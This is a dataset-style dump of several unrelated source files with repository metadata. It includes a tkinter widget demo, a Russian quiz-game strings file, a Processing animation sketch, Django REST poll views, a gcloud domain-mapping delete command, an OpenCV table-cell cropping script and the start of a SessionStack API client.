self.fileEntry.config(state='readonly')
self.netwEntry.delete(0, tk.END)
self.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.combo.get()
self.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.spin.get()
self.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.chVarUn.get(): self.check3.configure(state='disabled')
else: self.check3.configure(state='normal')
if self.chVarEn.get(): self.check2.configure(state='disabled')
else: self.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.radVar.get()
if radSel == 0: self.mySQL2.configure(text=WIDGET_LABEL + 'in Blue')
elif radSel == 1: self.mySQL2.configure(text=WIDGET_LABEL + 'in Gold')
elif radSel == 2: self.mySQL2.configure(text=WIDGET_LABEL + 'in Red')
# Exit GUI cleanly
def _quit(self):
self.win.quit()
self.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.scr.insert(tk.INSERT, str(idx) + '\n')
sleep(1)
print('methodInAThread():', self.runT.isAlive())
# Running methods in Threads
def createThread(self, num):
self.runT = Thread(target=self.methodInAThread, args=[num])
self.runT.setDaemon(True)
self.runT.start()
print(self.runT)
print('createThread():', self.runT.isAlive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.guiQueue.get()
print(qItem)
self.scr.insert(tk.INSERT, qItem + '\n')
# Button callback
def insertQuote(self):
title = self.bookTitle.get()
page = self.pageNumber.get()
quote = self.quote.get(1.0, tk.END)
print(title)
print(quote)
self.mySQL.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
allBooks = self.mySQL.showBooks()
print(allBooks)
self.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
#####################################################################################
def createWidgets(self):
# Tab Control introduced here --------------------------------------
tabControl = ttk.Notebook(self.win) # Create Tab Control
tab1 = ttk.Frame(tabControl) # Create a tab
tabControl.add(tab1, text='MySQL') # Add the tab
tab2 = ttk.Frame(tabControl) # Add a second tab
tabControl.add(tab2, text='Widgets') # Make second tab visible
tabControl.pack(expand=1, fill="both") # Pack to make visible
# ~ Tab Control introduced here -----------------------------------------
# We are creating a container frame to hold all other widgets
self.mySQL = ttk.LabelFrame(tab1, text=' Python Database ')
self.mySQL.grid(column=0, row=0, padx=8, pady=4)
# Creating a Label
ttk.Label(self.mySQL, text="Book Title:").grid(column=0, row=0, sticky='W')
# Adding a Textbox Entry widget
book = tk.StringVar()
self.bookTitle = ttk.Entry(self.mySQL, width=34, textvariable=book)
self.bookTitle.grid(column=0, row=1, sticky='W')
# Adding a Textbox Entry widget
book1 = tk.StringVar()
self.bookTitle1 = ttk.Entry(self.mySQL, width=34, textvariable=book1)
self.bookTitle1.grid(column=0, row=2, sticky='W')
# Adding a Textbox Entry widget
book2 = tk.StringVar()
self.bookTitle2 = ttk.Entry(self.mySQL, width=34, textvariable=book2)
self.bookTitle2.grid(column=0, row=3, sticky='W')
# Creating a Label
ttk.Label(self.mySQL, text="Page:").grid(column=1, row=0, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber.grid(column=1, row=1, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber1 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber1.grid(column=1, row=2, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber2 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber2.grid(column=1, row=3, sticky='W')
# Adding a Button
self.action = ttk.Button(self.mySQL, text="Insert Quote", command=self.insertQuote)
self.action.grid(column=2, row=1)
# Adding a Button
self.action1 = ttk.Button(self.mySQL, text="Get Quotes", command=self.getQuote)
self.action1.grid(column=2, row=2)
# Adding a Button
self.action2 = ttk.Button(self.mySQL, text="Mody Quote", command=self.modifyQuote)
self.action2.grid(column=2, row=3)
# Add some space around each widget
for child in self.mySQL.winfo_children():
child.grid_configure(padx=2, pady=4)
quoteFrame = ttk.LabelFrame(tab1, text=' Book Quotation ')
quoteFrame.grid(column=0, row=1, padx=8, pady=4)
# Using a scrolled Text control
quoteW = 40; quoteH = 6
self.quote = scrolledtext.ScrolledText(quoteFrame, width=quoteW, height=quoteH, wrap=tk.WORD)
self.quote.grid(column=0, row=8, sticky='WE', columnspan=3)
# Add some space around each widget
for child in quoteFrame.winfo_children():
child.grid_configure(padx=2, pady=4)
#======================================================================================================
# Tab Control 2
#======================================================================================================
# We are creating a container frame to hold all other widgets -- Tab2
self.mySQL2 = ttk.LabelFrame(tab2, text=WIDGET_LABEL)
self.mySQL2.grid(column=0, row=0, padx=8, pady=4)
# Creating three checkbuttons
self.chVarDis = tk.IntVar()
self.check1 = tk.Checkbutton(self.mySQL2, text="Disabled", variable=self.chVarDis, state='disabled')
self.check1.select()
self.check1.grid(column=0, row=0, sticky=tk.W)
self.chVarUn = tk.IntVar()
self.check2 = tk.Checkbutton(self.mySQL2, text="UnChecked", variable=self.chVarUn)
self.check2.deselect()
self.check2.grid(column=1, row=0, sticky=tk.W )
self.chVarEn = tk.IntVar()
self.check3 = tk.Checkbutton(self.mySQL2, text="Toggle", variable=self.chVarEn)
self.check3.deselect()
self.check3.grid(column=2, row=0, sticky=tk.W)
# trace the state of the two checkbuttons
self.chVarUn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
self.chVarEn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
# Radiobutton list
colors = ["Blue", "Gold", "Red"]
self.radVar = tk.IntVar()
# Selecting a non-existing index value for radVar
self.radVar.set(99)
# Creating all three Radiobutton widgets within one loop
for col in range(3):
curRad = 'rad' + str(col)
curRad = tk.Radiobutton(self.mySQL2, text=colors[col], variable=self.radVar, value=col, command=self.radCall)
curRad.grid(column=col, row=6, sticky=tk.W, columnspan=3)
# And now adding tooltips
ToolTip(curRad, 'This is a Radiobutton control.')
# Create a container to hold labels
labelsFrame = ttk.LabelFrame(self.mySQL2, text=' Labels within a Frame ')
labelsFrame.grid(column=0, row=7, pady=6)
# Place labels into the container element - vertically
ttk.Label(labelsFrame, text="Choose a number:").grid(column=0, row=0)
ttk.Label(labelsFrame, text="Label 2").grid(column=0, row=1)
# Add some space around each label
for child in labelsFrame.winfo_children():
child.grid_configure(padx=6, pady=1)
number = tk.StringVar()
self.combo = ttk.Combobox(self.mySQL2, width=12, textvariable=number)
self.combo['values'] = (1, 2, 4, 42, 100)
self.combo.grid(column=1, row=7, sticky=tk.W)
self.combo.current(0)
self.combo.bind('<<ComboboxSelected>>', self._combo)
# Adding a Spinbox widget using a set of values
self.spin = Spinbox(self.mySQL2, values=(1, 2, 4, 42, 100), width=5, bd=8, command=self._spin)
self.spin.grid(column=2, row=7, sticky='W,', padx=6, pady=1)
# Using a scrolled Text control
scrolW = 40; scrolH = 1
self.scr = scrolledtext.ScrolledText(self.mySQL2, width=scrolW, height=scrolH, wrap=tk.WORD)
self.scr.grid(column=0, row=8, sticky='WE', columnspan=3)
# Create Manage Files Frame ------------------------------------------------
mngFilesFrame = ttk.LabelFrame(tab2, text=' Manage Files: ')
mngFilesFrame.grid(column=0, row=1, sticky='WE', padx=10, pady=5)
# Button Callback
def getFileName():
print('hello from getFileName')
fDir = path.dirname(__file__)
fName = fd.askopenfilename(parent=self.win, initialdir=fDir)
print(fName)
self.fileEntry.config(state='enabled')
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fName)
if len(fName) > self.entryLen:
self.fileEntry.config(width=len(fName) + 3)
# Add Widgets to Manage Files Frame
lb = ttk.Button(mngFilesFrame, text="Browse to File...", command=getFileName)
lb.grid(column=0, row=0, sticky=tk.W)
#-----------------------------------------------------
file = tk.StringVar()
self.entryLen = scrolW - 4
self.fileEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=file)
self.fileEntry.grid(column=1, row=0, sticky=tk.W)
#-----------------------------------------------------
logDir = tk.StringVar()
self.netwEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=logDir)
self.netwEntry.grid(column=1, row=1, sticky=tk.W)
def copyFile():
import shutil
src = self.fileEntry.get()
file = src.split('/')[-1]
dst = self.netwEntry.get() + '\\'+ file
try:
shutil.copy(src, dst)
mBox.showinfo('Copy File to Network', 'Succes: File copied.')
except FileNotFoundError as err:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(err))
except Exception as ex:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(ex))
cb = ttk.Button(mngFilesFrame, text="Copy File To : ", command=copyFile)
cb.grid(column=0, row=1, sticky=tk.E)
# Add some space around each label
for child in mngFilesFrame.winfo_children():
child.grid_configure(padx=6, pady=6)
# Creating a Menu Bar ==========================================================
menuBar = Menu(tab1)
self.win.config(menu=menuBar)
# Add menu items
fileMenu = Menu(menuBar, tearoff=0)
fileMenu.add_command(label="New")
fileMenu.add_separator()
fileMenu.add_command(label="Exit", command=self._quit)
menuBar.add_cascade(label="File", menu=fileMenu)
# Add another Menu to the Menu Bar and an item
helpMenu = Menu(menuBar, tearoff=0)
helpMenu.add_command(label="About")
menuBar.add_cascade(label="Help", menu=helpMenu)
# Change the main windows icon
self.win.iconbitmap('pyc.ico')
# Using tkinter Variable Classes
strData = tk.StringVar()
strData.set('Hello StringVar')
# It is not necessary to create a tk.StringVar()
strData = tk.StringVar()
strData = self.spin.get()
# Place cursor into name Entry
self.bookTitle.focus()
# Add a Tooltip to the Spinbox
ToolTip(self.spin, 'This is a Spin control.')
# Add Tooltips to more widgets
ToolTip(self.bookTitle, 'This is an Entry control.')
ToolTip(self.action, 'This is a Button control.')
ToolTip(self.scr, 'This is a ScrolledText control.')
#======================
# Start GUI
#======================
oop = OOP()
oop.win.mainloop()
|
[
"noreply@github.com"
] |
actuarial-tools.noreply@github.com
|
dcad9b56560d0941b2a0e5ed5d3b3e2336da3c37
|
0785df5c1d893a23a77b73617c1b5c10e6ac238f
|
/local.py
|
7dd3a4cb48cf307e906381640d9a3d04ea3eccd3
|
[] |
no_license
|
AnufrievaAnastasia/Project3
|
dd9482b2c1cb1722c4a1bcfd69f8c3f8210b7fbf
|
237bf9f9c04704a2e8a22ac4088d4ad805f8eeac
|
refs/heads/master
| 2020-08-23T05:03:21.903122
| 2019-10-21T11:21:05
| 2019-10-21T11:21:05
| 216,549,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
TXT_TASK = 'Игра "Правда или Ложь", на прохождение у вас только две попытки'
TXT_ANS_1 = 'Самым твердым природным материалом на Земле является титан '
TXT_ANS_2 = 'В среднем около 10 лет человек проводит во сне '
TXT_ANS_3 = 'Стрекозы - самые быстролетающие насекомые '
TXT_ANS_4 = 'Фильм "Титаник" стоил дороже, чем строительство самого судна в свое время, с учетом инфляции '
TXT_ANS_5 = 'В Норвегии посвятили в рыцари пингвина '
TXT_ANS_6 = 'Муравьи спят утром '
TXT_ANS_7 = 'Карамбола - морская рыба '
TXT_ANS_8 = 'Невежда - невоспитанный и грубый человек '
TXT_ANS_9 = 'В Новой Зеландии язык жестов имеет статус государственного '
TXT_ANS_10 = 'Dell - американская корпорация в области производства компьютеров '
TXT_TRUE = 'правда'
TXT_FALSE = 'ложь'
TXT_END = 'Игра ЗАКОНЧЕНА!'
TXT_WIN = 'Вы ВЫИГРАЛИ!'
|
[
"anufrieva_01@mail.ru"
] |
anufrieva_01@mail.ru
|
86404a656d1321585c146107b8e2b33929d19370
|
809f119d53610261d71c5e9b5f620c41524868b1
|
/main.py
|
eb0ecb4bd43e420c3f19ab15dbdcc22cd75d1cd5
|
[] |
no_license
|
HackerulGogu/SnakeImpact
|
d07c9866ec8b4320c393b24fbd47793e0c03a140
|
c6c65f9e1de5cc446a56340ac0462cc4ed362b75
|
refs/heads/master
| 2021-04-11T04:19:15.420141
| 2020-03-21T14:51:55
| 2020-03-21T14:51:55
| 248,991,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15
|
py
|
print('merge')
|
[
"novaialex44@gmail.com"
] |
novaialex44@gmail.com
|
3c7e5c0670bdcf86f8a00bc3574132e66221f1ea
|
579f04eda7851cd89e04cd39ecf48a0d09f63244
|
/mandala/sketch_cat.pyde
|
4655f0ece0ab99fab7be7870be78a7ab91572cb4
|
[] |
no_license
|
jralipe/ccs221
|
0f378492a380b292e35ff7ec27b4e37cb1992726
|
c70f7834c707c089d2ce01a54b9eda70f50c418f
|
refs/heads/master
| 2020-12-28T18:22:15.919736
| 2020-05-29T00:48:53
| 2020-05-29T00:48:53
| 238,438,446
| 3
| 27
| null | 2020-03-05T11:31:06
| 2020-02-05T11:52:29
|
Python
|
UTF-8
|
Python
| false
| false
| 3,287
|
pyde
|
#Nyancat by Maria Arlyn Fuerte
#BSCS1A
catx = 0
caty = 0
flag = True
def setup():
size(900, 600)
background(25, 25, 112)
def draw():
global catx
global caty
global flag
noStroke()
background(25, 25, 112)
fill(255, 0, 0) #RED
rect(0, caty +150, 200, 20)
fill(255, 165, 0) #ORANGE
rect(0, caty +170, 200, 20)
fill(255, 255, 0) #YELLOW
rect(0, caty + 190, 200, 20)
fill(0, 128, 0) #GREEN
rect(0, caty +210, 200, 20)
fill(0, 0, 255) #BLUE
rect(0, caty +230, 200, 20)
fill(75, 0, 130) #Violet
rect(0, caty +250, 200, 20)
if caty > 280:
flag = False
if caty > 200:
catx +=1
if catx > 250:
caty -=1
if caty < 50:
catx -=1
if catx < 30:
caty +=1
#Pikabody
fill(160)
rect(200, caty +135, 180, 150)
fill(100)
rect(215, caty +150, 150, 120)
fill(160)
rect(215, caty +150, 10, 10)
rect(355, caty +150, 10, 10)
rect(215, caty +260, 10, 10)
#BELT
fill(255)
rect (240, caty+ 130, 30, 170)
#Shadow
fill(0)
rect(190, caty +145, 10, 150) #left
rect(380, caty +145, 10, 150) #right
rect(200, caty +285, 180, 10) #bottom
rect(210, caty +130, 160, 10) #top
rect(200, caty +135, 10, 10) #left
rect(370, caty +135, 10, 10) #right
rect(190, caty +280, 20, 10)
rect(180, caty +290, 10, 20)# backfeet left
rect(180, caty +310, 30, 10)#backfeet bottom
rect(210, caty +290, 10, 20) #backfeet right
rect(230, caty +290, 10, 20)
rect(240, caty +310, 20, 10)
rect(260, caty +290, 10, 30)
#backfeet
fill(160)
rect(190, caty +290, 20, 20)
rect(240, caty +290, 20, 20)
#head
fill(0)
rect(295, caty +220, 140, 40)
rect(305, caty +210, 120, 15)
rect(315, caty +205, 35, 8)
rect(380, caty +205, 35, 8)
rect(315, caty +197, 25, 8)
rect(390, caty +197, 25, 8)
rect(323, caty +189, 10, 8)
rect(398, caty +189, 10, 8)
rect(305, caty +255, 120, 15)
rect(315, caty +270, 100, 20)
rect(320, caty +290, 15, 10)
rect(330, caty +300, 20, 10)
rect(370, caty +290, 15, 10)
rect(380, caty +300, 20, 10)
fill(128)
rect(330, caty +290, 20, 10)
rect(380, caty +290, 20, 10)
rect(315, caty +225, 110, 30)
#eyes
fill(20, 20, 20)
rect(340, caty +230,20, 20)
rect(380, caty +230, 20, 20)
fill(235, 235, 235)
rect(350, caty +240, 10, 10)
rect(390, caty +240, 10, 10)
#cheeks
fill(250, 182, 193)
circle(322, caty +248, 15)
circle(418, caty +248, 15)
#SWORD
fill(50)
rect(400, caty +290, 30, 20)
rect(430, caty +280, 30, 40)
fill(255)
rect(460, caty +290, 90, 20)#BLADE
#shadow
fill(0)
rect(390, caty +300, 10, 20)
rect(400, caty+ 310, 40, 10)
rect(430, caty +320, 40, 10)
rect(460, caty +310, 90, 10)
rect(550, caty +290, 10, 30)
rect(460, caty +280, 90, 10)
rect(420, caty +270, 50, 10)
rect(410, caty +280, 20, 10)
rect(540, caty +290, 10, 10)
|
[
"noreply@github.com"
] |
jralipe.noreply@github.com
|
fc6660d4b5263329f3ba30e3115d2c3f11ba7cdc
|
36a5fb4183534c1f7e2523a80c510c4d59746fe9
|
/sgs/cmd_handlers.py
|
7bc5a5e76f1656a7f16962450eba8dd8fac19ae0
|
[] |
no_license
|
morningbzy/SGS
|
85856ce313a404430fab7fffc5dfc5f9603feaab
|
23db709af3e56d6082c8283ea2fd6f0caf10e85e
|
refs/heads/master
| 2021-01-15T13:18:19.315256
| 2013-08-07T15:38:39
| 2013-08-07T15:38:39
| 10,073,280
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,143
|
py
|
# -*- coding: UTF-8 -*-
import logging
import tornado.escape
import tornado.auth
import tornado.web
from sgs.user import global_users
from sgs.game import global_game
from sgs.cmd import Cmd
class BaseHandler(tornado.web.RequestHandler):
def get_current_user(self):
user_json = self.get_secure_cookie("user")
if not user_json:
return None
return tornado.escape.json_decode(user_json)
class AuthLoginHandler(BaseHandler):
def get(self):
self.render("login.html")
def post(self):
name = self.get_argument("name")
user_dict = {'pk': name, 'name': name}
if global_users.has_user(name):
# TODO: 恢复用户状态
self.redirect("/auth/login")
else:
global_users.add_user(**user_dict)
self.set_secure_cookie("user", tornado.escape.json_encode(user_dict))
self.redirect("/")
#class AuthLoginHandler(BaseHandler, tornado.auth.GoogleMixin):
# @tornado.web.asynchronous
# @gen.coroutine
# def get(self):
# if self.get_argument("openid.mode", None):
# user = yield self.get_authenticated_user()
# user_dict = tornado.escape.json_encode(user)
# self.set_secure_cookie("sgs_user", user_dict)
# self.redirect("/")
# return
# self.authenticate_redirect(ax_attrs=["name"])
class AuthLogoutHandler(BaseHandler):
def get(self):
self.clear_cookie("user")
self.write("You are now logged out")
class IndexHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
if not self.current_user\
or not global_users.has_user(self.current_user['pk']):
self.redirect('/auth/login')
else:
self.render("game.html")
class SgsCmdRequestHandler(BaseHandler):
@tornado.web.authenticated
def post(self):
cmd_args = self.request.arguments
cmd_args.pop('_xsrf', None)
cmd = cmd_args.pop('cmd')[0]
cmd_args = dict([(k, v[0]) if len(v) == 1 else v
for k, v in cmd_args.iteritems()])
user = global_users.get_user(self.current_user['pk'])
if user.seat_id is not None and 'seat_id' not in cmd_args:
cmd_args['seat_id'] = user.seat_id
cmd = Cmd(cmd, sender=user.pk, **cmd_args)
logging.info('<-- [%s] %s' % (cmd, cmd_args))
self.write(dict(cmds=[cmd.get_ack_cmd().to_simple_dict()]))
global_game.handle_cmd(cmd)
#global_users.broadcast_cmd(cmd)
@tornado.web.authenticated
@tornado.web.asynchronous
def get(self):
user_dict = self.get_current_user()
user = global_users.get_user(user_dict['pk'])
if user:
user.get_cmds(self.on_new_cmd)
else:
self.write(dict(cmds=[]))
def on_new_cmd(self, cmds):
# Closed client connection
if self.request.connection.stream.closed():
user = global_users.get_user(self.get_current_user()['pk'])
user.resend_cmd(cmds)
return
self.finish(dict(cmds=[cmds.to_simple_dict()]))
|
[
"morningbzy@gmail.com"
] |
morningbzy@gmail.com
|
6e295f76fbefde92e0f7d98a4c2ea8a9eb480c01
|
71e6546941d2763946b69800dfb15679fab70d14
|
/image_process.py
|
7b0734e9d6eda4d01c3dc08c071991c44d18d957
|
[] |
no_license
|
ruitengchang/private
|
510d58d1ca5ad5cc7ec7147f0ae00249f38da0a4
|
f9ac73cd1f21d4f1febc0abca627bb1fce2fe3a5
|
refs/heads/master
| 2020-06-05T17:12:34.768517
| 2019-06-18T09:52:55
| 2019-06-18T09:52:55
| 192,493,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,368
|
py
|
import cv2 as cv
import numpy as np
import os
def line_image(image):
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
#cv.imshow("gray",gray)
edges = cv.Canny(gray, 100, 500, apertureSize=3)
#cv.imshow("canny",edges)
# contours,hierarchy=cv.findContours(edges,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)
# point_size=1
# point_color=(0,0,255)
# thickness=4
# print("contours",np.array(contours).shape)
# for i in range(np.array(contours).shape[0]):
# cv.circle(image,(contours[i][0][0][0],contours[i][0][0][1]),point_size,point_color,thickness)
# cv.imshow("result",image)
#cv.imshow("lunkuo",contours)
#r,g,b=cv.split(image)
# cv.connectedComponents(r)
# cv.imshow("conn",cv.merge([r,r,r]))
#print("dian:",hierarchy)
#print("dian shape:",hierarchy.shape)
lines = cv.HoughLines(edges, 1, np.pi / 2, 190)
#print("lines:",lines.shape)
#print(lines)
col=[]
row=[]
#print(col)
#print("----")
for line in lines:
rho, theta = line[0]
if(theta<1):
col.append(rho)
else:
row.append(rho)
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
x1 = int(x0 + 2000 * (-b))
y1 = int(y0 + 2000 * (a))
x2 = int(x0 - 2000 * (-b))
y2 = int(y0 - 2000 * (a))
cv.line(image, (x1, y1), (x2, y2), (0, 0, 255), 2)
#cv.imshow("hough", image)
return col,row
def judge(image,p1,p2,p3,p4):
count=0.0
r,g,b=cv.split(image)
#print(r.shape)#(1080,550)
total=float((abs(p4[0]-p1[0]))*(abs(p4[1]-p1[1])))
for i in range(int(abs(p4[0]-p1[0]))):
for j in range(int(abs(p4[1]-p1[1]))):
x=int(i+p1[0])
y=int(j+p1[1])
if(x>=r.shape[1]):
x=r.shape[1]-1
if(y>=r.shape[0]):
y=r.shape[0]-1
if(r[y][x]!=255):
count=count+1
if(count/total>0.8):
#print("find one")
return 1
else:return 0
def mkdir(path):
# 引入模块
import os
# 去除首位空格
path = path.strip()
# 去除尾部 \ 符号
path = path.rstrip("\\")
# 判断路径是否存在
# 存在 True
# 不存在 False
isExists = os.path.exists(path)
# 判断结果
if not isExists:
# 如果不存在则创建目录
# 创建目录操作函数
os.makedirs(path)
print(path + ' 创建成功')
return True
else:
# 如果目录存在则不创建,并提示目录已存在
print(path + ' 目录已存在')
return False
def img_process(input):
src = cv.imread(input)
_x=src.shape[1]
_y=src.shape[0]
b,g,r=cv.split(src)
for i in range(b.shape[0]):
for j in range(b.shape[1]):
if(b[i][j]!=255):
b[i][j]=0
src_merged=cv.merge([b,b,b])#src:原图,src_merged:二值化的图,需要对两张图都进行直线检测,结合两次直线检测结果。
#cv.imshow("merged",src_merged)
#line_image(src)#对原图进行直线检测
col,row=line_image(src_merged)#对二值化图进行直线检测
col.sort()
row.sort()
if(col[0]>0):
col.append(0)
col.sort()
if(col[len(col)-1]<_x):
col.append(_x)
if(row[0]>0):
row.append(0)
row.sort()
if(row[len(row)-1]<_y):
row.append(_y)
#print(row)
#print(col)
result=[]
for i in range(len(col)-2):
for j in range(len(row)-2):
p1=[col[i],row[j]]
p2=[col[i+1],row[j]]
p3=[col[i],row[j+1]]
p4=[col[i+1],row[j+1]]
if(judge(src_merged,p1,p2,p3,p4)==1):
result.append([p1,p2,p3,p4])
#print("result",np.array(result).shape)
#print(result)
# for i in range(len(result)):
# print(tuple(result[i]))
# cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2)
# cv.imshow("rec",src_merged)
while(1):#判断区域之间是能够结合,若能结合则结合
do_sth=0
for i in range(len(result)):
for j in range(len(result)-i-1):
if((result[i][1]==result[j][0]) & (result[i][3]==result[j][2])):
result.append([result[i][0],result[j][1],result[i][2],result[j][3]])
result.remove(result[i])
result.remove(result[j-1])
do_sth=1
break
if(do_sth==1):
break
if(do_sth==0):
break
#print(result)
# for i in range(len(result)):
# print(tuple(result[i]))
# cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2)
# cv.imshow("rec",src_merged)
for i in range(len(result)):
new_img=src[int(result[i][0][1]):int(result[i][2][1]),int(result[i][0][0]):int(result[i][1][0])]
#cv.imshow("new%d"%(i),new_img)
path=input.split(".")
#mkdir("%s"%(path[0]))
#os.chdir("%s"%(path[0]))
filename="%snew%d.jpg"%(path[0],i)
print(filename)
cv.imwrite(filename,new_img)
os.chdir("image_example/1/")
print("out path:",os.getcwd())
files=os.listdir()
for file in files:
img_process(file)
cv.waitKey(0)
cv.destroyAllWindows()
|
[
"noreply@github.com"
] |
ruitengchang.noreply@github.com
|
405974db9681a1efc9bb65d55fa0ae64ee33d230
|
94470cf07f402b1c7824e92a852cd3203f94ac4a
|
/polls/apiviews.py
|
6f6ca88b9da4638cbf0f4888e4305f24fa9ffee5
|
[] |
no_license
|
jbeltranleon/pollsapi_django_rest
|
c509bf0b0c1e2db870ed8a4aaa1647bf74c5f8cd
|
0855820541064ffd77dbd1c6e77f695d4f18e517
|
refs/heads/master
| 2020-04-14T17:55:02.364183
| 2019-01-04T16:01:46
| 2019-01-04T16:01:46
| 163,999,126
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,203
|
py
|
from rest_framework import generics
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from .models import Poll, Choice
from .serializers import PollSerializer, ChoiceSerializer,\
VoteSerializer
class PollList(generics.ListCreateAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class PollDetail(generics.RetrieveDestroyAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class ChoiceList(generics.ListCreateAPIView):
def get_queryset(self):
queryset = Choice.objects.filter(poll_id=self.kwargs["pk"])
return queryset
serializer_class = ChoiceSerializer
class CreateVote(APIView):
def post(self, request, pk, choice_pk):
voted_by = request.data.get("voted_by")
data = {'choice': choice_pk, 'poll': pk, 'voted_by': voted_by}
serializer = VoteSerializer(data=data)
if serializer.is_valid():
vote = serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
|
[
"jbeltranleon@gmail.com"
] |
jbeltranleon@gmail.com
|
4aff36fdb71b2bbc4fd29e2773506848f06a1fd6
|
8a7d5d67052892dd5d2a748282958f6244d963c6
|
/google-cloud-sdk/lib/surface/app/domain_mappings/delete.py
|
32842caf145b27ecec1a4e5410e7656b9643a037
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KisleK/capstone
|
7d1d622bd5ca4cd355302778a02dc6d32ed00c88
|
fcef874f4fcef4b74ca016ca7bff92677673fded
|
refs/heads/master
| 2021-07-04T03:29:44.888340
| 2017-07-24T16:16:33
| 2017-07-24T16:16:33
| 93,699,673
| 0
| 2
| null | 2020-07-24T22:44:28
| 2017-06-08T02:34:17
|
Python
|
UTF-8
|
Python
| false
| false
| 1,812
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for deleting an App Engine domain mapping."""
from googlecloudsdk.api_lib.app.api import appengine_domains_api_client as api_client
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
"""Deletes a specified domain mapping."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To delete an App Engine domain mapping, run:
$ {command} '*.example.com'
""",
}
@staticmethod
def Args(parser):
flags.DOMAIN_FLAG.AddToParser(parser)
def Run(self, args):
console_io.PromptContinue(
prompt_string=('Deleting mapping [{0}]. This will stop your app from'
' serving from this domain.'.format(args.domain)),
cancel_on_no=True)
if self.ReleaseTrack() == base.ReleaseTrack.ALPHA:
client = api_client.AppengineDomainsApiAlphaClient.GetApiClient()
else:
client = api_client.AppengineDomainsApiClient.GetApiClient()
client.DeleteDomainMapping(args.domain)
log.DeletedResource(args.domain)
|
[
"kisle.kuhn1@gmail.com"
] |
kisle.kuhn1@gmail.com
|
e2e44ffd1b8897513aaba446dd704ac14b2c5945
|
35dbd536a17d7127a1dd1c70a2903ea0a94a84c2
|
/src/sentry_plugins/sessionstack/client.py
|
2c50f1bafe960bbe0331c77cff05e234168642de
|
[
"Apache-2.0",
"BUSL-1.1"
] |
permissive
|
nagyist/sentry
|
efb3ef642bd0431990ca08c8296217dabf86a3bf
|
d9dd4f382f96b5c4576b64cbf015db651556c18b
|
refs/heads/master
| 2023-09-04T02:55:37.223029
| 2023-01-09T15:09:44
| 2023-01-09T15:09:44
| 48,165,782
| 0
| 0
|
BSD-3-Clause
| 2022-12-16T19:13:54
| 2015-12-17T09:42:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,683
|
py
|
import requests
from sentry.http import safe_urlopen
from sentry.utils import json
from .utils import add_query_params, get_basic_auth, remove_trailing_slashes
ACCESS_TOKEN_NAME = "Sentry"
DEFAULT_SENTRY_SOURCE = "sentry"
API_URL = "https://api.sessionstack.com"
PLAYER_URL = "https://app.sessionstack.com/player"
WEBSITES_ENDPOINT = "/v1/websites/{}"
SESSION_ENDPOINT = "/v1/websites/{}/sessions/{}"
ACCESS_TOKENS_ENDPOINT = "/v1/websites/{}/sessions/{}/access_tokens"
SESSION_URL_PATH = "/#/sessions/"
MILLISECONDS_BEFORE_EVENT = 5000
class SessionStackClient:
def __init__(self, account_email, api_token, website_id, **kwargs):
self.website_id = website_id
api_url = kwargs.get("api_url") or API_URL
self.api_url = remove_trailing_slashes(api_url)
player_url = kwargs.get("player_url") or PLAYER_URL
self.player_url = remove_trailing_slashes(player_url)
